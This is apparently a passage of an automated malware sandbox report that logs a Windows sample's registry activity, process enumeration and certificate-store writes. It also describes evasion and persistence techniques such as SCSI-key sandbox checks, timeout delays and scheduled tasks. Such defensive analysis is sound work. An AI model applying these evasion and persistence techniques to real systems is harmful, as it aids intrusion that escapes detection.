\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeliciousPart.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WEBDOWN.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Documents.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language univ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Terminal_9235.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neonn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 5584 cmd.exe 5604 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
up.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI up.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2464 timeout.exe -
Processes:
iexplore.exeiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEmshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B763699-A385-11EF-8D9B-F2BBDB1F0DCB} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{183FFFC1-A385-11EF-8D9B-F2BBDB1F0DCB} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80dae3ed9137db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Modifies registry class 9 IoCs
Processes:
minesweeper.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6} minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats minesweeper.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\LastPlayed = "0" minesweeper.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\LastPlayed = "2" minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows minesweeper.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX minesweeper.exe -
Processes:
4363463463464363463463463.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6016 schtasks.exe 3392 schtasks.exe 2564 schtasks.exe 2568 schtasks.exe 3680 schtasks.exe 2136 schtasks.exe 3276 schtasks.exe 4356 schtasks.exe 3684 schtasks.exe 1768 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeTerminal_9235.exepowershell.exeneonn.exe%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exeFaced.pifInstallUtil.exe286830899.exeneon.exeneon.exe123264690.exe1658518264.exepowershell.execonhost.exepid process 3064 powershell.exe 2516 Terminal_9235.exe 2516 Terminal_9235.exe 2516 Terminal_9235.exe 2572 powershell.exe 1364 neonn.exe 1364 neonn.exe 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe 1364 neonn.exe 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 1364 neonn.exe 1364 neonn.exe 5984 Faced.pif 5984 Faced.pif 1364 neonn.exe 6044 InstallUtil.exe 6044 InstallUtil.exe 4452 286830899.exe 6044 InstallUtil.exe 4788 neon.exe 4860 